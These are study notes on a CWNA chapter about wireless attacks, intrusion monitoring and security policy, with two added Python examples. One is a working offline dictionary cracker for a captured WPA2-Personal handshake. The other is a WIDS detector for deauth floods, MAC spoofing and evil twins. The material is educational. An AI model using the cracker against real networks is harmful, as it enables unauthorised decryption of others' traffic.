CWNA Chapter 14 – Wireless Attacks, Intrusion Monitoring and Policy

My Notes from chapter 14 of the CWNA study guide

Wireless attacks

  • Rogue wireless devices
    • A potential open and unsecured gateway straight into the wired infrastructure that the company wants to protect.
    • However, what is there to prevent an individual from installing their own wireless portal onto the network backbone?
    • A rogue access point is any unauthorized Wi-Fi device that is not under the management of the proper network administrators.
    • The individuals most responsible for installing rogue access points are typically not hackers; they are employees not realizing the consequences of their actions.
    • Ad hoc wireless connections also have the potential of providing rogue access into the corporate network
    • The Ethernet connection and the Wi-Fi network interface controller (NIC) can be bridged together—an intruder might access the ad hoc wireless network and then potentially route their way to the Ethernet connection and get onto the wired network.
    • Many government agencies and corporations ban the use of ad hoc networks for this very reason.
    • On some computers, it is possible to limit the use of multiple NICs simultaneously.
    • When the user plugs an Ethernet cable into the computer, the wireless adapter is automatically disabled, eliminating the risk of an intentional or unintentional bridged network.
    • Furthermore, besides physical security, there is nothing to prevent an intruder from also connecting their own rogue access point via an Ethernet cable into any live data port provided in a wall plate.
    • If an 802.1X solution is deployed for the wireless network, it can also be used to secure the network ports on the wired network
    • In that case, any new device, including APs, would need to be authenticated to the network prior to being given access.
  • Peer-to-peer attacks
    • A commonly overlooked risk is the peer-to-peer attack
    • An 802.11 client station can be configured in either Infrastructure mode or Ad Hoc mode.
    • Because an IBSS is by nature a peer-to-peer connection, any user who can connect wirelessly with another user can potentially gain access to any resource available on either computer
    • Users that are associated to the same access point are potentially just as vulnerable to peer-to-peer attacks as IBSS users.
    • Properly securing your wireless network often involves protecting authorized users from each other, because hacking at companies is often performed internally by employees.
    • In most WLAN deployments, Wi-Fi clients communicate only with devices on the wired network, such as email or web servers, and peer-to-peer communications are not needed.
    • If connections are required to other wireless peers, the traffic is routed through a layer 3 switch or other network device before passing to the desired destination station.
    • Client isolation is a feature that can often be enabled on WLAN access points or controllers to block wireless clients from communicating with other wireless clients on the same wireless VLAN
    • Some applications require peer-to-peer connectivity. Many VoWiFi phones offer push-to-talk capabilities that use multicasting
  • Eavesdropping
    • 802.11 wireless networks operate in license free frequency bands, and all data transmissions travel in the open air
    • Access to wireless transmissions is available to anyone within listening range, and therefore strong encryption is mandatory
    • Wireless communications can be monitored via two eavesdropping methods:
      • Casual eavesdropping
        • Is sometimes referred to as WLAN discovery
        • Is accomplished by simply exploiting the 802.11 frame exchange methods that are clearly defined by the 802.11-2012 standard
        • Software utilities known as WLAN discovery tools exist for the purpose of finding open WLAN networks.
        • Many popular and freely available WLAN discovery programs exist, such as inSSIDer, WiFiFoFum, and iStumbler, that individuals can use to discover wireless networks
        • WLAN discovery tools send out null probe requests across all license-free 802.11 channels with the hope of receiving probe response frames containing wireless network information, such as SSID, channel, encryption, and so on
        • WLAN discovery is typically considered harmless and in the past was referred to as wardriving
      • Malicious eavesdropping
        • The unauthorized use of 802.11 protocol analysers to capture wireless communications is typically considered illegal
        • Most countries have laws making it illegal to listen in on any type of electromagnetic communications, including 802.11 wireless transmissions
        • Many commercial and freeware 802.11 protocol analysers exist that allow wireless network administrators to capture 802.11 traffic for the purpose of analysing and troubleshooting their own wireless networks
        • The problem is that anyone with malicious intent can also capture 802.11 traffic from any Wi-Fi network.
        • A wireless intrusion detection system (WIDS) cannot detect malicious eavesdropping
        • For this reason, a strong, dynamic encryption solution is mandatory: TKIP/RC4 at minimum (since deprecated), or preferably CCMP/AES
        • Malicious eavesdropping of this nature is highly illegal.
        • Because of the passive and undetectable nature of this attack, encryption must always be implemented to provide data privacy.
        • The most common targets of malicious eavesdropping attacks are public access hotspots
  • Encryption cracking
    • The current WEP-cracking tools that are freely available on the Internet can crack WEP encryption in as little as 5 minutes
    • An attacker usually needs only to capture several hundred thousand encrypted packets with a protocol analyser and then run the captured data through a WEP-cracking software program
    • The software utility will usually then be able to derive the secret 40-bit or 104-bit key in a matter of seconds
    • After the secret key has been revealed, the attacker can decrypt any and all encrypted traffic
    • Because the attacker can decrypt the traffic, they can reassemble the data and read it as if there was no encryption whatsoever
  • Authentication attacks
    • The 802.11-2012 standard does not define which type of EAP authentication method to use, and not all flavors of EAP are created equal
    • Lightweight Extensible Authentication Protocol (LEAP), once one of the most commonly deployed 802.1X/EAP solutions, is susceptible to offline dictionary attacks.
    • The hashed password response during the LEAP authentication process is crackable
    • An attacker merely has to capture a frame exchange when a LEAP user authenticates and then run the capture file through an offline dictionary attack tool
    • The password can be derived in a matter of seconds. The username is also seen in cleartext during the LEAP authentication process
    • Stronger EAP authentication protocols that use tunnelled authentication (for example, EAP-PEAP or EAP-TTLS) are not susceptible to offline dictionary attacks, because the inner credential exchange is protected by the outer TLS tunnel. This holds only if the client validates the authentication server's certificate; a client that accepts any certificate will hand the inner exchange to a rogue authentication server.
    • If an authorized WLAN portal can be compromised and the authentication credentials can be obtained, network resources are exposed
    • WPA/WPA2-Personal, also known as PSK authentication, is a weak authentication method that is vulnerable to an offline brute-force dictionary attack
    • If a hacker has the passphrase and captures the 4-Way Handshake, they can re-create the dynamic encryption keys and decrypt traffic.
    • A policy mandating very strong passphrases of 20 characters or more should always be in place whenever a WPA/WPA2-Personal solution is deployed
  • MAC spoofing
    • Usually, MAC filters are configured to apply restrictions that will allow traffic only from specific client stations to pass through.
    • Unfortunately, MAC addresses can be spoofed, or impersonated, and any amateur hacker can easily bypass any MAC filter by spoofing an allowed client station’s address
    • Because of spoofing and because of all of the administrative work involved with setting up MAC filters, MAC filtering is not considered a reliable means of security for wireless enterprise networks and should be implemented only as a last resort
  • Management interface exploits
    • Interfaces that are not used should be disabled.
    • Strong passwords should be used, and encrypted login capabilities using SSH (Secure Shell) or Hypertext Transfer Protocol Secure (HTTPS) should always be utilized.
    • It is not uncommon for attackers to use security holes left in management interfaces to reconfigure APs.
    • After gaining access via a management interface, an attacker might even be able to initiate a firmware upgrade of the wireless hardware and, while the upgrade is being performed, power off the equipment.
  • Wireless hijacking
    • Also known as the evil twin attack
    • The attacker configures access point software on a laptop, effectively turning a Wi-Fi client radio into an access point
    • The access point software is configured with the same SSID that is used by a public hotspot access point
    • The attacker then sends spoofed disassociation or deauthentication frames, forcing users associated with the hotspot AP to roam to the evil twin AP
    • At this point, the attacker has effectively hijacked wireless clients at layer 2 from the original AP.
    • The evil twin will typically be configured with a Dynamic Host Configuration Protocol (DHCP) server available to issue IP addresses to the clients
    • The attacker may also be using a second wireless NIC with their laptop to execute what is known as a man-in-the-middle attack

chapter14-1.png

    • These attacks can take another form in what is known as a Wi-Fi phishing attack. The attacker may also run web server software and captive portal software.
    • The attacker's fake login page may then request a credit card number from the hijacked user. Phishing attacks are common on the Internet and are now appearing at your local hotspot.
    • The only way to prevent a hijacking, man-in-the-middle, or Wi-Fi phishing attack is to use a mutual authentication solution
    • 802.1X/EAP authentication solutions require that mutual authentication credentials be exchanged before a user can be authorized: the supplicant validates the authentication server's certificate before presenting its own credentials, so an evil twin that cannot present that certificate never completes the exchange. A user cannot get an IP address unless authorized; therefore, users cannot be hijacked. This protection depends on clients being configured to validate the server certificate rather than accept any certificate presented.
  • Denial of service (DoS)
    • The attack on wireless networks that seems to receive the least amount of attention is the denial of service (DoS)
    • With the proper tools, any individual with ill intent can temporarily disable a Wi-Fi network by preventing legitimate users from accessing network resources.
    • Monitoring systems exist that can detect and identify DoS attacks immediately
    • Usually nothing can be done to prevent DoS attacks other than locating and removing the source of the attack.
    • DoS attacks can occur at either layer 1 or layer 2 of the OSI model. Layer 1 attacks are known as RF jamming attacks.
    • Two types of jamming attacks:
      • Intentional Jamming
        • Occurs when an attacker uses some type of signal generator to cause interference in the unlicensed frequency space
        • Narrowband and wideband jammers exist
        • Either causing all data to become corrupted or causing the 802.11 radios to continuously defer when performing a clear channel assessment (CCA).
      • Unintentional Jamming
        • Unintentional jamming is more common
        • Interference from microwave ovens, cordless phones, and other devices can also cause denial of service.
        • Although not necessarily an attack, it can cause as much harm as an intentional jamming attack.
    • The best tool to detect any type of layer 1 interference, whether intentional or unintentional, is a spectrum analyser
    • The more common type of denial-of-service attacks that originate from hackers are layer 2 DoS attacks
    • A wide variety of layer 2 DoS attacks exist that are a result of manipulating 802.11 frames
    • The most common involves spoofing disassociation or deauthentication frames.
    • Many more types of layer 2 DoS attacks exist, including association floods, authentication floods, PS-Poll floods, and virtual carrier attacks
    • The 802.11w amendment (incorporated into 802.11-2012) defines management frame protection (MFP) mechanisms that prevent spoofing of certain 802.11 management frames, including deauthentication and disassociation frames
    • A spectrum analyser is your best tool to detect a layer 1 DoS attack, and a protocol analyser or wireless IDS is your best tool to detect a layer 2 DoS attack
    • The best way to prevent any type of denial-of-service attack is physical security.
  • Vendor-specific attacks
    • Hackers often find holes in the firmware code used by specific WLAN access point and WLAN controller vendors
    • Most of these vendor-specific exploits are in the form of buffer overflow attacks.
    • These are normally fixed via a firmware update
  • Social engineering
    • Is a technique used to manipulate people into divulging confidential information, such as computer passwords.
    • The best defence against social engineering attacks is strictly enforced policies to prevent confidential information from being shared.
    • Any information that is static is extremely susceptible to social engineering attacks
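Worked example of the WPA/WPA2-Personal weakness described under Authentication attacks above. This is added code, not from the CWNA guide: it implements the 802.11 passphrase-to-PMK mapping, the PTK expansion from the 4-Way Handshake (MAC addresses plus ANonce/SNonce), and the EAPOL-Key MIC check that an offline dictionary attack uses as its oracle, then recovers the TK that decrypts the session. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed; the "captured" EAPOL-Key message 2 is produced locally with the legitimate supplicant-side computation so the example runs offline.

```python
"""Offline dictionary attack against a captured WPA2-Personal 4-Way Handshake (added example)."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11 passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(AA, SPA) || min/max(ANonce, SNonce)).

    The 48 bytes split into KCK (16, signs EAPOL MICs), KEK (16) and TK (16, the CCMP data key).
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP Key MIC: HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """EAPOL-Key message 2 of 4 (supplicant -> AP), Key Info 0x010a, with the MIC filled in."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP group/pairwise, PSK AKM
    body = struct.pack(">BHH8s32s16s8s8s", 2, 0x010A, 0, bytes(7) + b"\x01",
                       snonce, bytes(16), bytes(8), bytes(8))
    body += bytes(MIC_LEN) + struct.pack(">H", len(rsn_ie)) + rsn_ie
    frame = struct.pack(">BBH", 2, 3, len(body)) + body        # EAPOL version 2, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Try each candidate: PMK -> PTK -> recompute the MIC and compare with the captured one.

    Nothing is sent over the air; the captured MIC is the only oracle needed. On success returns
    (passphrase, TK), since the TK is what decrypts that session's CCMP traffic.
    """
    observed = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        ptk = derive_ptk(psk_to_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), observed):
            return candidate, ptk[32:48]
    return None, None


# Constructed scenario (not real network data).
SSID = "CorpGuest"
AA = bytes.fromhex("021122334455")    # AP BSSID (constructed)
SPA = bytes.fromhex("02aabbccddee")   # client MAC (constructed)
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
WORDLIST = ["password", "letmein", "CorpGuest", "sunshine1", "qwerty123"]


def capture_handshake(passphrase: str) -> bytes:
    """Stand-in for sniffing message 2: the real client computes it from the real passphrase."""
    ptk = derive_ptk(psk_to_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return build_msg2(SNONCE, ptk[:16])


def demo(passphrase: str = "sunshine1"):
    """Capture a handshake protected by `passphrase`, then run the wordlist against it."""
    return crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, capture_handshake(passphrase))


if __name__ == "__main__":
    found, tk = demo()
    print("recovered passphrase:", found, "TK:", tk.hex() if tk else None)
    print("20+ character passphrase recovered?", demo("correct horse battery staple 2012")[0])
```

The cost of each guess is one PBKDF2 run (4096 HMAC-SHA1 iterations), which is why a passphrase drawn from a wordlist falls in seconds while a long random one only moves the attacker's bill up; the SSID acts as the salt, so precomputed tables only help against common SSIDs.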

Intrusion monitoring

  • Wireless intrusion detection system (WIDS)
    • might be necessary even if there is no authorized 802.11 Wi-Fi network on site
    • After an 802.11 network is installed for access, it has become almost mandatory to also have a WIDS because of the other numerous attacks against Wi-Fi, such as DoS, hijacking, and so on.
    • The typical WIDS is a client-server model that consists of three components:
      • WIDS Server
        • Is a software server or hardware server appliance acting as a central point of security monitoring and performance data collection
        • Uses signature analysis, behaviour analysis, protocol analysis, and RF spectrum analysis to detect potential threats
        • Behaviour analysis looks for 802.11 anomalies
      • Management Consoles
        • A software-based management console is used to communicate back to a WIDS server from a desktop station
        • used for administration and configuration of the server and sensors.
        • The management console can also be used for 24/7 monitoring of 802.11 wireless networks
      • Sensors (Hardware or software)
        • May be placed strategically to listen to and capture all 802.11 communications.
        • The eyes and ears of a WIDS monitoring solution
        • Basically radio devices that are in a constant listening mode as passive devices
        • Are usually hardware based and resemble an access point
        • Standalone sensors do not provide access to WLAN clients because they are configured in a listen-only mode
        • The sensors constantly scan all 14 channels in the 2.4 GHz ISM band, as well as all of the channels in the 5 GHz U-NII bands
        • Access points can also be used as part-time sensors.
        • WIDS are best at monitoring layer 2 attacks, such as MAC spoofing, disassociation attacks, and deauthentication attacks
    • Currently, three WIDS design models exist
      • Overlay
        • The most secure model
        • WIDS that is deployed on top of the existing wireless network.
        • uses an independent vendor’s WIDS and can be deployed to monitor any existing or planned WLAN
        • The overlay solution consists of a WIDS server and sensors that are not part of the WLAN solution that provides access to clients.
        • Dedicated overlay systems are not as common as they used to be, as WIDS features have been rolled into enterprise wireless solutions
      • Integrated
        • A centralized WLAN controller or a centralized network management server (NMS) functions as the IDS server
        • Access points can be configured in a full-time sensor-only mode or can act as part-time sensors when not transmitting as access points
        • A recommended practice would be to also deploy some APs as full-time sensors
        • less expensive solution but may not have all the capabilities that are offered in an overlay WIDS
      • Integration Enabled
        • APs integrate software code that can be used to turn the APs into sensors that will communicate with the third-party WIDS server.
  • Wireless intrusion prevention system (WIPS)
    • Most WIDS vendors prefer to call their product a wireless intrusion prevention system
    • The reason that they prefer the term prevention systems is that they are all now capable of mitigating attacks from rogue APs and rogue clients
    • A WIPS characterizes access points and client radios in four or more classifications
      • Infrastructure Device
        • Refers to any client station or AP that is an authorized member of the company’s wireless network
      • Unknown Device
        • Is assigned automatically to any new 802.11 radios that have been detected but not yet classified as a rogue or infrastructure device
      • Known Device
        • Refers to any client station or AP that is detected by the WIPS and whose identity is known
        • The known device label is typically manually assigned by an administrator to radio devices of neighbouring businesses that are not considered a threat
      • Rogue Device
        • Refers to any client station or AP that is considered an interfering device and a potential threat
        • Most WIPS define rogue APs as devices that are actually plugged into the network backbone and are not known or managed by the organization
    • Most WIPS vendors use different terminology when classifying devices
  • Mobile WIDS
    • Laptop versions of a WIDS
    • The software program is a protocol analyser capable of decoding frames with some layer 1 analysis capabilities as well
    • Most 802.11 protocol analyser software offers standalone mobile security and performance analysis tools
    • Think of a mobile WIDS as a single sensor, server, and console built into one unit
    • One useful feature of a mobile WIDS is that it can detect a rogue AP and client and then be used to track them down
  • Spectrum analyser
    • Is a frequency domain tool that can detect any RF signal in the frequency range that is being scanned.
    • A spectrum analyser that monitors the 2.4 GHz ISM band will be able to detect both intentional jamming and unintentional jamming devices.
    • Two forms of spectrum analysis systems are available: mobile and distributed
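An added example, not from the CWNA guide or any WIDS product, of the layer 2 analysis a WIDS sensor performs on the management frames it hears: the MAC spoofing, disassociation and deauthentication monitoring noted above, plus the evil twin check from the Wireless hijacking notes. It parses raw 802.11 management frame headers and applies three checks: sequence-number discontinuities on a transmitter address (spoofed frames come from a different radio's counter), a deauthentication/disassociation flood against one BSSID inside a sliding time window, and beacons that advertise an authorized SSID from an unauthorized BSSID. The MAC addresses, SSIDs, timestamps and frame bytes are constructed here; the thresholds (10 frames per second, a sequence jump of more than 50) are illustrative assumptions, not vendor defaults.

```python
"""WIDS-style layer 2 checks over a constructed 802.11 management-frame capture (added example)."""
import struct
from collections import defaultdict

MGMT = 0                               # frame type 0 = management
BEACON, DISASSOC, DEAUTH = 8, 10, 12   # management subtypes
BROADCAST = b"\xff" * 6


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mgmt_frame(subtype, da, sa, bssid, seq, body=b""):
    """802.11 management frame: Frame Control, Duration, Addr1 (DA), Addr2 (SA), Addr3 (BSSID), Seq Ctl, body."""
    fc = struct.pack("<H", (MGMT << 2) | (subtype << 4))
    seq_ctl = struct.pack("<H", (seq & 0x0FFF) << 4)   # 12-bit sequence number, 4-bit fragment number
    return fc + b"\x00\x00" + da + sa + bssid + seq_ctl + body


def beacon_body(ssid: str) -> bytes:
    """Beacon fixed fields (timestamp, interval, capability) followed by an SSID IE (tag 0)."""
    return struct.pack("<QHH", 0, 100, 0x0411) + bytes([0, len(ssid)]) + ssid.encode()


def parse(frame: bytes):
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    seq = struct.unpack_from("<H", frame, 22)[0] >> 4
    return ftype, subtype, frame[4:10], frame[10:16], frame[16:22], seq, frame[24:]


def beacon_ssid(body: bytes):
    """Walk the tagged IEs after the 12 fixed bytes and return the SSID, if present."""
    i = 12
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        if tag == 0:
            return body[i + 2:i + 2 + length].decode(errors="replace")
        i += 2 + length
    return None


def analyze(capture, authorized, window_s=1.0, flood_threshold=10, max_seq_jump=50):
    """capture: [(timestamp, frame)] in time order; authorized: {ssid: {bssid}}. Returns alert dicts."""
    alerts, seen = [], set()
    deauth_times = defaultdict(list)
    last_seq = {}

    def alert(kind, addr, detail):
        if (kind, addr) not in seen:                  # one alert per condition and address
            seen.add((kind, addr))
            alerts.append({"kind": kind, "addr": mac_str(addr), "detail": detail})

    for ts, frame in capture:
        ftype, subtype, da, sa, bssid, seq, body = parse(frame)
        if ftype != MGMT:
            continue
        # 1. Sequence-number continuity per transmitter: a real radio's counter advances by one per
        #    frame, so frames spoofing the AP's MAC from another card show up as jumps (MAC spoofing).
        if sa in last_seq:
            delta = ((seq - last_seq[sa] + 2048) % 4096) - 2048
            if delta < 0 or delta > max_seq_jump:
                alert("seq_anomaly", sa, f"sequence jump {last_seq[sa]} -> {seq}")
        last_seq[sa] = seq
        # 2. Deauthentication/disassociation flood against one BSSID inside a sliding window (layer 2 DoS).
        if subtype in (DEAUTH, DISASSOC):
            reason = struct.unpack_from("<H", body, 0)[0] if len(body) >= 2 else None
            times = deauth_times[bssid]
            times.append(ts)
            while ts - times[0] > window_s:
                times.pop(0)
            if len(times) >= flood_threshold:
                alert("deauth_flood", bssid, f"{len(times)} frames in {window_s}s, reason code {reason}")
        # 3. Evil twin / rogue AP: a beacon carrying an authorized SSID from an unauthorized BSSID.
        elif subtype == BEACON:
            ssid = beacon_ssid(body)
            if ssid in authorized and bssid not in authorized[ssid]:
                alert("evil_twin", bssid, f"unauthorized BSSID advertising '{ssid}'")
    return alerts


# Constructed scenario (not real network data).
CORP_AP = mac("02:11:22:33:44:55")
EVIL_AP = mac("02:de:ad:be:ef:00")
NEIGHBOR_AP = mac("02:77:88:99:aa:bb")
AUTHORIZED = {"CorpWLAN": {CORP_AP}}


def build_capture():
    """Corporate and neighbour beacons every 100 ms, an evil twin beaconing 'CorpWLAN', and a deauth flood."""
    cap = []
    for i in range(20):
        cap.append((i * 0.1, mgmt_frame(BEACON, BROADCAST, CORP_AP, CORP_AP, 100 + i, beacon_body("CorpWLAN"))))
        cap.append((i * 0.1 + 0.02, mgmt_frame(BEACON, BROADCAST, NEIGHBOR_AP, NEIGHBOR_AP, 500 + i, beacon_body("Cafe-Guest"))))
    for i in range(12):
        cap.append((i * 0.1 + 0.05, mgmt_frame(BEACON, BROADCAST, EVIL_AP, EVIL_AP, 1 + i, beacon_body("CorpWLAN"))))
    for i in range(15):   # injected deauths spoofing the corporate AP; reason code 7 = class 3 frame from nonassociated STA
        cap.append((1.0 + i * 0.01, mgmt_frame(DEAUTH, BROADCAST, CORP_AP, CORP_AP, 3000 + i, struct.pack("<H", 7))))
    cap.sort(key=lambda entry: entry[0])
    return cap
```

Running `analyze(build_capture(), AUTHORIZED)` yields one alert each for the flood, the sequence anomaly on the corporate AP's address, and the evil twin, and nothing for the neighbouring AP, which is the "known device" a WIPS operator would whitelist. A sensor sees only the channels it dwells on, so the flood threshold is tuned per deployment; the sequence-number check is the one that keeps working even at low frame rates, because it keys on the spoofed transmitter rather than on volume.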

Wireless security policy

  • General security policy
    • When establishing a wireless security policy, you must first define a general policy
    • A general wireless security policy defines the following items:
      • Statement of Authority
        • Defines who put the wireless policy in place and the executive management that backs the policy.
      • Applicable Audience
        • Audience to whom the policy applies, such as employees, visitors, and contractors.
      • Violation Reporting Procedures
        • Define how the wireless security policy will be enforced, including what actions should be taken and who is in charge of enforcement.
      • Risk Assessment and Threat Analysis
        • Defines the potential wireless security risks and threats and what the financial impact will be on the company if a successful attack occurs.
      • Security Auditing
        • Internal auditing procedures, as well as the need for independent outside audits, should also be defined.
  • Functional security policy
    • Define the technical aspects of wireless security
    • Establishes how to secure the wireless network in terms of what solutions and actions are needed
    • A functional wireless security policy will define the following items:
      • Policy Essentials
        • Basic security procedures, such as password policies, training, and proper usage of the wireless network, are policy essentials and should be defined
      • Baseline Practices
        • Define minimum wireless security practices such as configuration checklists, staging and testing procedures, etc.
      • Design and Implementation
        • The actual authentication, encryption, and segmentation solutions that are to be put in place are defined
      • Monitoring and Response
        • All wireless intrusion detection procedures and the appropriate response to alarms are defined.
  • Legislative compliance
    • In most countries, there are mandated regulations on how to protect and secure data communications within all government agencies
    • In the United States, NIST maintains the Federal Information Processing Standards (FIPS).
    • In the United States, other legislation exists for protecting information and communications in certain industries. These include the following:
      • HIPAA
        • The Health Insurance Portability and Accountability Act (HIPAA) establishes national standards for electronic healthcare transactions and national standards for providers, health insurance plans, and employers
      • Sarbanes-Oxley
        • Defines stringent controls on corporate accounting and auditing procedures with a goal of corporate responsibility and enhanced financial disclosure.
      • GLBA
        • The Gramm-Leach-Bliley Act (GLBA) requires banks and financial institutions to notify customers of policies and practices disclosing customer information
  • PCI compliance
    • The Payment Card Industry (PCI) realizes that in order to sustain continued business growth, measures must be taken to protect customer data and card numbers.
    • The PCI Security Standards Council (SSC) has implemented regulations for organizations processing and storing cardholder information.
    • The resulting Payment Card Industry Data Security Standard (PCI DSS) is commonly referred to as the PCI Standard.
    • Within this standard are components governing the use of wireless devices
  • 802.11 wireless policy recommendations
    • Although a detailed and thorough policy document should be created, these six wireless security policies are highly recommended as a minimum:
      • BYOD Policy
        • Each employer needs to define a bring your own device (BYOD) policy that clearly states how personal devices will be onboarded onto the secure corporate WLAN
        • The policy should also state how the personal devices can be used while connected to the company WLAN and which corporate network resources are accessible
      • Remote-Access WLAN Policy
        • End users take their laptops and handheld devices off site and away from company grounds
        • This policy should include the required use of an IPsec or SSL VPN solution to provide device authentication, user authentication, and strong encryption of all wireless data traffic
      • Rogue AP Policy
        • No end users should ever be permitted to install their own wireless devices on the corporate network
        • This policy should be strictly enforced.
      • Ad Hoc Policy
        • End users should not be permitted to set up ad hoc or peer-to-peer networks.
      • Wireless LAN Proper Use Policy
        • This policy should include proper installation procedures, proper security implementations, and allowed application use on the wireless LAN
      • IDS Policy
        • Policies should be written defining how to properly respond to alerts generated by the wireless intrusion detection system